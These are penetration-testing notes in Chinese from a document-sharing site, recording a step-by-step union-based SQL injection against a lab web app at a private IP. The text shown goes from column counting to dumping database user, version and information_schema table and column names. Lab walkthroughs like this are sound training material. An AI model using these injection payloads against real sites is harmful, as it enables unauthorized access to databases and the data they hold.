from mysql to shell渗透测试笔记.docx
《from mysql to shell渗透测试笔记.docx》由会员分享,可在线阅读,更多相关《from mysql to shell渗透测试笔记.docx(22页珍藏版)》请在冰豆网上搜索。
frommysqltoshell渗透测试笔记
http:
//192.168.128.128/
http:
//192.168.128.128/cat.php?
id=1%27
YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear'''atline1
telnet192.168.128.12880
http:
//192.168.128.128/cat.php?
id=2%20order%20by%203#
显示正常
http:
//192.168.128.128/cat.php?
id=2%20order%20by%204#
显示正常
http:
//192.168.128.128/cat.php?
id=2%20order%20by%205#
Unknowncolumn'5'in'orderclause'
http:
//192.168.128.128/cat.php?
id=2%20union%20select%201,2,3,4
显示所有页面
http:
//192.168.128.128/cat.php?
id=2%20union%20select%201,2,3,4,5
TheusedSELECTstatementshaveadifferentnumberofcolumns
http:
//192.168.128.128/cat.php?
id=2%20union%20select%20user(),database(),version(),4
显示所有页面,但是没有user()等信息
http:
//192.168.128.128/cat.php?
id=1%20union%20select%20user(),database(),@@version,current_user()
显示所有页面,但是没有user()等信息
http:
//192.168.128.128/cat.php?
id=1%20union%20select%201,user(),3,4
显示picture:
pentesterlab@localhost
http:
//192.168.128.128/cat.php?
id=1%20union%20select%201,database(),3,4
picture:
photoblog
http:
//192.168.128.128/cat.php?
id=1%20union%20select%201,version(),3,4
picture:
5.1.63-0+squeeze1
http:
//192.168.128.128/cat.php?
id=1%20union%20select%201,current_user(),3,4
picture:
pentesterlab@localhost
http:
//192.168.128.128/cat.php?
id=1%20union%20select%201,tablename,3,4%20from%20information_schema.tables
Unknowncolumn'tablename'in'fieldlist'
http:
//192.168.128.128/cat.php?
id=1%20union%20select%201,table_name,3,4%20from%20information_schema.tables
picture:
character_sets
CHARACTER_SETS
picture:
collations
COLLATIONS
picture:
collation_character_set_applicability
COLLATION_CHARACTER_SET_APPLICABILITY
picture:
columns
COLUMNS
picture:
column_privileges
COLUMN_PRIVILEGES
picture:
engines
ENGINES
picture:
events
EVENTS
picture:
files
FILES
picture:
global_status
GLOBAL_STATUS
picture:
global_variables
GLOBAL_VARIABLES
picture:
key_column_usage
KEY_COLUMN_USAGE
picture:
partitions
PARTITIONS
picture:
plugins
PLUGINS
picture:
processlist
PROCESSLIST
picture:
profiling
PROFILING
picture:
referential_constraints
REFERENTIAL_CONSTRAINTS
picture:
routines
ROUTINES
picture:
schemata
SCHEMATA
picture:
schema_privileges
SCHEMA_PRIVILEGES
picture:
session_status
SESSION_STATUS
picture:
session_variables
SESSION_VARIABLES
picture:
statistics
STATISTICS
picture:
tables
TABLES
picture:
table_constraints
TABLE_CONSTRAINTS
picture:
table_privileges
TABLE_PRIVILEGES
picture:
triggers
TRIGGERS
picture:
user_privileges
USER_PRIVILEGES
picture:
views
VIEWS
picture:
categories
categories
picture:
pictures
pictures
picture:
users
users
http:
//192.168.128.128/cat.php?
id=1%20union%20select%201,column_name,3,4%20from%20information_schema.columns
picture:
character_set_name
CHARACTER_SET_NAME
picture:
default_collate_name
DEFAULT_COLLATE_NAME
picture:
description
DESCRIPTION
picture:
maxlen
MAXLEN
picture:
collation_name
COLLATION_NAME
picture:
id
ID
picture:
is_default
IS_DEFAULT
picture:
is_compiled
IS_COMPILED
picture:
sortlen
SORTLEN
picture:
table_catalog
TABLE_CATALOG
picture:
table_schema
TABLE_SCHEMA
picture:
table_name
TABLE_NAME
picture:
column_name
COLUMN_NAME
picture:
ordinal_position
ORDINAL_POSITION
picture:
column_default
COLUMN_DEFAULT
picture:
is_nullable
IS_NULLABLE
picture:
data_type
DATA_TYPE
picture:
character_maximum_length
CHARACTER_MAXIMUM_LENGTH
picture:
character_octet_length
CHARACTER_OCTET_LENGTH
picture:
numeric_precision
NUMERIC_PRECISION
picture:
numeric_scale
NUMERIC_SCALE
picture:
column_type
COLUMN_TYPE
picture:
column_key
COLUMN_KEY
picture:
extra
EXTRA
picture:
privileges
PRIVILEGES
picture:
column_comment
COLUMN_COMMENT
picture:
grantee
GRANTEE
picture:
privilege_type
PRIVILEGE_TYPE
picture:
is_grantable
IS_GRANTABLE
picture:
engine
ENGINE
picture:
support
SUPPORT
picture:
comment
COMMENT
picture:
transactions
TRANSACTIONS
picture:
xa
XA
picture:
savepoints
SAVEPOINTS
picture:
event_catalog
EVENT_CATALOG
picture:
event_schema
EVENT_SCHEMA
picture:
event_name
EVENT_NAME
picture:
definer
DEFINER
picture:
time_zone
TIME_ZONE
picture:
event_body
EVENT_BODY
picture:
event_definition
EVENT_DEFINITION
picture:
event_type
EVENT_TYPE
picture:
execute_at
EXECUTE_AT
picture:
interval_value
INTERVAL_VALUE
picture:
interval_field
INTERVAL_FIELD
picture:
sql_mode
SQL_MODE
picture:
starts
STARTS
picture:
ends
ENDS
picture:
status
STATUS
picture:
on_completion
ON_COMPLETION
picture:
created
CREATED
picture:
last_altered
LAST_ALTERED
picture:
last_executed
LAST_EXECUTED
picture:
event_comment
EVENT_COMMENT
picture:
originator
ORIGINATOR
picture:
character_set_client
CHARACTER_SET_CLIENT
picture:
collation_connection
COLLATION_CONNECTION
picture:
database_collation
DATABASE_COLLATION
picture:
file_id
FILE_ID
picture:
file_name
FILE_NAME
picture:
file_type
FILE_TYPE
picture:
tablespace_name
TABLESPACE_NAME
picture:
logfile_group_name
LOGFILE_GROUP_NAME
picture:
logfile_group_number
LOGFILE_GROUP_NUMBER
picture:
fulltext_keys
FULLTEXT_KEYS
picture:
deleted_rows
DELETED_ROWS
picture:
update_count
UPDATE_COUNT
picture:
free_extents
FREE_EXTENTS
picture:
total_extents
TOTAL_EXTENTS
picture:
extent_size
EXTENT_SIZE
picture:
initial_size
INITIAL_SIZE
picture:
maximum_size
MAXIMUM_SIZE
picture:
autoextend_size
AUTOEXTEND_SIZE
picture:
creation_time
CREATION_TIME
picture:
last_update_time
LAST_UPDATE_TIME
picture:
last_access_time
LAST_ACCESS_TIME
picture:
recover_time
RECOVER_TIME
picture:
transaction_counter
TRANSACTION_COUNTER
picture:
version
VERSION
picture:
row_format
ROW_FORMAT
picture:
table_rows
TABLE_ROWS
picture:
avg_row_length
AVG_ROW_LENGTH
picture:
data_length
DATA_LENGTH
picture:
max_data_length
MAX_DATA_LENGTH
picture:
index_length
INDEX_LENGTH
picture:
data_free
DATA_FREE
picture:
create_time
CREATE_TIME
picture:
update_time
UPDATE_TIME
picture:
check_time
CHECK_TIME
picture:
checksum
CHECKSUM
picture:
variable_name
VARIABLE_NAME
picture:
variable_value
VARIABLE_VALUE
picture:
constraint_catalog
CONSTRAINT_CATALOG
picture:
constraint_schema
CONSTRAINT_SCHEMA
picture:
constraint_name
CONSTRAINT_NAME
picture:
position_in_unique_constraint
POSITION_IN_UNIQUE_CONSTRAINT
picture:
referenced_table_schema
REFERENCED_TABLE_SCHEMA
picture:
referenced_table_name
REFERENCED_TABLE_NAME
picture:
referenced_column_name
REFERENCED_COLUMN_NAME
picture:
partition_name
PARTITION_NAME
picture:
subpartition_name
SUBPARTITION_NAME
picture:
partition_ordinal_position
PARTITION_ORDINAL_POSITION
picture:
subpartition_ordinal_position
SUBPARTITION_ORDINAL_POSITION
picture:
partition_method
PARTITION_METHOD
picture:
subpartition_method
SUBPARTITION_METHOD
picture:
partition_expression
PARTITION_EXPRESSION
picture:
subpartition_expression
SUBPARTITION_EXPRESSION
picture:
partition_description
PARTITION_DESCRIPTION
picture:
partition_comment
PARTITION_COMMENT
picture:
nodegroup
NODEGROUP
picture:
plugin_name
PLUGIN_NAME
picture:
plugin_version
PLUGIN_VERSION
picture:
plugin_status
PLUGIN_STATUS
picture:
plugin_type
PLUGIN_TYPE
picture:
plugin_type_version
PLUGIN_TYPE_VERSION
picture:
plugin_library
PLUGIN_LIBRARY
picture:
plugin_library_version
PLUGIN_LIBRARY_VERSION
picture:
plugin_author
PLUGIN_AUTHOR
picture:
plugin_description
PLUGIN_DESCRIPTION
picture:
plugin_license
PLUGIN_LICENSE
picture:
user
USER
picture:
host
HOST
picture:
db
DB
picture:
command
COMMAND
picture:
time
TIME
picture:
state
STATE
picture:
info
INFO
picture:
query_id
QUERY_ID
picture:
seq
SEQ
picture:
duration
DURATION
picture:
cpu_user
CPU_USER
picture:
cpu_system
CPU_SYSTEM
picture:
context_voluntary
CONTEXT_VOLUNTARY
picture:
context_involuntary
CONTEXT_INVOLUNTARY
picture:
block_ops_in
BLOCK_OPS_IN
picture:
block_ops_out
BLOCK_OPS_OUT
picture:
messages_sent
MESSAGES_SENT
picture:
messages_received
MESSAGES_RECEIVED
picture:
page_faults_major
PAGE_FAULTS_MAJOR
picture:
page_faults_minor
PAGE_FAULTS_MINOR
picture:
swaps
SWAPS
picture:
source_function
SOURCE_FUNCTION
picture:
source_file
SOURCE_FILE
picture:
source_line
SOURCE_LINE
picture:
unique_constraint_catalog
UNIQUE_CONSTRAINT_CATALOG
picture:
unique_constraint_schema
UNIQUE_CONSTRAINT_SCHEMA
picture:
unique_constraint_name
UNIQUE_CONSTRAINT_NAME
picture:
match_option
MATCH_OPTION
picture:
update_rule
UPDATE_RULE
picture:
delete_rule
DELETE_RULE
picture:
specific_name
SPECIFIC_NAME
picture:
routine_catalog
ROUTINE_CATALOG
picture:
routine_schema
ROUTINE_SCHEMA
picture:
routine_name
ROUTINE_NAME
picture:
routine_type
ROUTINE_TYPE
picture:
dtd_identifier
DTD_IDENTIFIER
picture:
routine_body
ROUTINE_BODY
picture:
routine_definition
ROUTINE_DEFINITION
picture:
external_name
EXTERNAL_NAME
picture:
external_language
EXTERNAL_LANGUAGE
picture:
parameter_style
PARAMETER_STYLE
picture:
is_deterministic
IS_DETERMINISTIC
picture:
sql_data_access
SQL_DATA_ACCESS
picture:
sql_path
SQL_PATH
picture:
security_type
SECURITY_TYPE
picture:
routine_comment
ROUTINE_COMMENT
picture:
catalog_name
CATALOG_NAME
picture:
schema_name
SCHEMA_NAME
picture:
default_character_set_name
DEFAULT_CHARACTER_SET_NAME
picture:
default_collation_name
DEFAULT_COLLATION_NAME
picture:
non_unique
NON_UNIQUE
picture:
index_schema
INDEX_SCHEMA
picture:
index_name
INDEX_NAME
picture:
seq_in_index
SEQ_IN_INDEX
picture:
collation
COLLATION
picture:
cardinality
CARDINALITY
picture:
sub_part
SUB_PART
picture:
packed
PACKED
picture:
nullable
NULLABLE
picture:
index_type
INDEX_TYPE
picture:
table_type
TABLE_TYPE
picture:
auto_increment
AUTO_INCREMENT
picture:
table_collation
TABLE_COLLATION
picture:
create_options
CREATE_OPTIONS
升级会员 